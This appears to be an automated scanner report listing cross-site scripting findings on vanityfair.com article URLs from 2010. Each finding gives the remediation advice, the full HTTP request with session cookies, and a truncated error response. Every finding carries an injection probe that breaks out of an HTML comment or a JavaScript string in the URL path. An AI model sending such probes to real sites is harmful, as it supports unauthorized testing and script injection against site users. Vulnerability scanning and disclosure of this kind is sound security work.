The value of REST URL parameter 5 is copied into an HTML comment. The payload e51c8-->12c7cc6591b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.htmle51c8-->12c7cc6591b HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:28 GMT Date: Mon, 29 Nov 2010 16:49:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47903
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... -:[138621515]:- Thread id: 40. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.htmle51c8-->12c7cc6591b?proxyuri=online%2Fdaily%2F2010%2F11%2Funanswered-questions-concerning-the-mean-girls-2-trailer.htmle51c8--%3E12c7cc6591b': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b572'%3bd964a373029 was submitted in the REST URL parameter 5. This input was echoed as 8b572';d964a373029 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html8b572'%3bd964a373029 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:24 GMT Date: Mon, 29 Nov 2010 16:49:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... t type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html8b572';d964a373029', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e74d'%3bf61050925fe was submitted in the REST URL parameter 3. This input was echoed as 6e74d';f61050925fe in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/20106e74d'%3bf61050925fe/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:03 GMT Date: Mon, 29 Nov 2010 16:49:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/20106e74d';f61050925fe/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dri ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 48872-->a3b76beceaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/201048872-->a3b76beceaf/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:05 GMT Date: Mon, 29 Nov 2010 16:49:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47859
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... [Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[163203336]:- Thread id: 40. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/201048872-->a3b76beceaf/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html?proxyuri=online%2Fdaily%2F201048872--%3Ea3b76beceaf%2F11%2Fwhy-sarah-palins-alaska-lost-nearly-half-its-viewers.html': escaped absolute pat ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload b5a5f-->defc695a165 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11b5a5f-->defc695a165/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:18 GMT Date: Mon, 29 Nov 2010 16:49:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... use bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[1683743881]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11b5a5f-->defc695a165/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html?proxyuri=online%2Fdaily%2F2010%2F11b5a5f--%3Edefc695a165%2Fwhy-sarah-palins-alaska-lost-nearly-half-its-viewers.html': escaped absolute path n ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f62'%3b4a38c756d74 was submitted in the REST URL parameter 4. This input was echoed as 74f62';4a38c756d74 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/1174f62'%3b4a38c756d74/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:17 GMT Date: Mon, 29 Nov 2010 16:49:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/1174f62';4a38c756d74/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload fce87-->b1703c27c79 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.htmlfce87-->b1703c27c79 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:34 GMT Date: Mon, 29 Nov 2010 16:49:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58adb'%3b8d36709a3 was submitted in the REST URL parameter 5. This input was echoed as 58adb';8d36709a3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html58adb'%3b8d36709a3 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:32 GMT Date: Mon, 29 Nov 2010 16:49:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... cript type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html58adb';8d36709a3', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload b21aa-->5881383178f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010b21aa-->5881383178f/11/wikileaks-blind-items.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:39 GMT Date: Mon, 29 Nov 2010 16:48:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47520
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fe2b'%3b218b5adc48e was submitted in the REST URL parameter 3. This input was echoed as 1fe2b';218b5adc48e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/20101fe2b'%3b218b5adc48e/11/wikileaks-blind-items.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:37 GMT Date: Mon, 29 Nov 2010 16:48:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/20101fe2b';218b5adc48e/11/wikileaks-blind-items.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue global ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b0bc'%3b6244b1b49b9 was submitted in the REST URL parameter 4. This input was echoed as 3b0bc';6244b1b49b9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/113b0bc'%3b6244b1b49b9/wikileaks-blind-items.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:57 GMT Date: Mon, 29 Nov 2010 16:48:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/113b0bc';6244b1b49b9/wikileaks-blind-items.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally. ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload bed10-->dd76bfd9213 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11bed10-->dd76bfd9213/wikileaks-blind-items.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
